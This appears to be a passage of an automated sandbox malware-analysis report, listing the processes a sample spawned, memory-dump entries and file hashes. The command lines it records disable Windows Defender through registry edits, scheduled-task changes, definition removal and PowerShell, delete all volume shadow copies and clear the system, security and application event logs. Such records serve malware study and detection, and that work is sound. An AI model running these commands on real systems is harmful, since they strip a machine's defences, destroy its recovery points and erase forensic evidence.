C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/656-54-0x0000000000000000-mapping.dmp
memory/704-55-0x0000000000000000-mapping.dmp
memory/1640-56-0x0000000000000000-mapping.dmp
memory/1020-57-0x0000000000000000-mapping.dmp
memory/1148-58-0x0000000000000000-mapping.dmp
memory/1804-59-0x0000000000000000-mapping.dmp
memory/1952-60-0x0000000000000000-mapping.dmp
memory/308-61-0x0000000000000000-mapping.dmp
memory/824-62-0x0000000000000000-mapping.dmp
memory/1056-63-0x0000000000000000-mapping.dmp
memory/660-64-0x0000000000000000-mapping.dmp
memory/1172-65-0x0000000000000000-mapping.dmp
memory/1112-66-0x0000000000000000-mapping.dmp
memory/1664-67-0x0000000000000000-mapping.dmp
memory/992-68-0x0000000000000000-mapping.dmp
memory/988-69-0x0000000000000000-mapping.dmp
memory/1812-70-0x0000000000000000-mapping.dmp
memory/1712-71-0x0000000000000000-mapping.dmp
memory/1656-72-0x0000000000000000-mapping.dmp
memory/1624-73-0x0000000000000000-mapping.dmp
memory/1896-74-0x0000000000000000-mapping.dmp
memory/780-75-0x0000000000000000-mapping.dmp
memory/1632-76-0x0000000000000000-mapping.dmp
memory/2000-77-0x0000000000000000-mapping.dmp
memory/1604-78-0x0000000000000000-mapping.dmp
memory/328-79-0x0000000000000000-mapping.dmp
memory/704-80-0x0000000000000000-mapping.dmp
memory/1984-81-0x0000000000000000-mapping.dmp
memory/1064-82-0x0000000000000000-mapping.dmp
memory/972-83-0x0000000000000000-mapping.dmp
memory/1440-84-0x0000000000000000-mapping.dmp
memory/1100-85-0x0000000000000000-mapping.dmp
memory/1192-86-0x0000000000000000-mapping.dmp
memory/1664-87-0x0000000000000000-mapping.dmp
memory/1028-88-0x0000000000000000-mapping.dmp
memory/1704-89-0x0000000000000000-mapping.dmp
memory/1736-90-0x0000000000000000-mapping.dmp
memory/1748-91-0x0000000000000000-mapping.dmp
memory/1908-92-0x0000000000000000-mapping.dmp
memory/896-93-0x0000000000000000-mapping.dmp
memory/1864-94-0x0000000000000000-mapping.dmp
memory/1868-95-0x0000000000000000-mapping.dmp
memory/1212-96-0x0000000000000000-mapping.dmp
memory/1216-97-0x0000000000000000-mapping.dmp
memory/1180-98-0x0000000000000000-mapping.dmp
memory/1272-99-0x0000000000000000-mapping.dmp
memory/1520-100-0x0000000000000000-mapping.dmp
memory/1208-101-0x0000000000000000-mapping.dmp
memory/280-102-0x0000000000000000-mapping.dmp
memory/460-103-0x0000000000000000-mapping.dmp
memory/1964-104-0x0000000000000000-mapping.dmp
memory/900-105-0x0000000000000000-mapping.dmp
memory/2028-106-0x0000000000000000-mapping.dmp
memory/1988-107-0x0000000000000000-mapping.dmp
memory/912-108-0x0000000000000000-mapping.dmp
memory/1056-109-0x0000000000000000-mapping.dmp
memory/1108-110-0x0000000000000000-mapping.dmp
memory/1892-111-0x0000000000000000-mapping.dmp
memory/1904-112-0x0000000000000000-mapping.dmp
memory/756-113-0x0000000000000000-mapping.dmp
memory/1940-114-0x0000000000000000-mapping.dmp
memory/1516-115-0x0000000000000000-mapping.dmp
memory/600-116-0x0000000000000000-mapping.dmp
memory/1168-117-0x0000000000000000-mapping.dmp
memory/1340-118-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
memory/1340-119-0x00000000023E0000-0x000000000302A000-memory.dmp
memory/1340-120-0x00000000023E0000-0x000000000302A000-memory.dmp
memory/1340-121-0x00000000023E0000-0x000000000302A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 136df8aa392c6a628beedcf3fa5b77ef |
| SHA1 | b1358967b392b0066c22811f77833433e71da1ac |
| SHA256 | 2704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f |
| SHA512 | 44d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9 |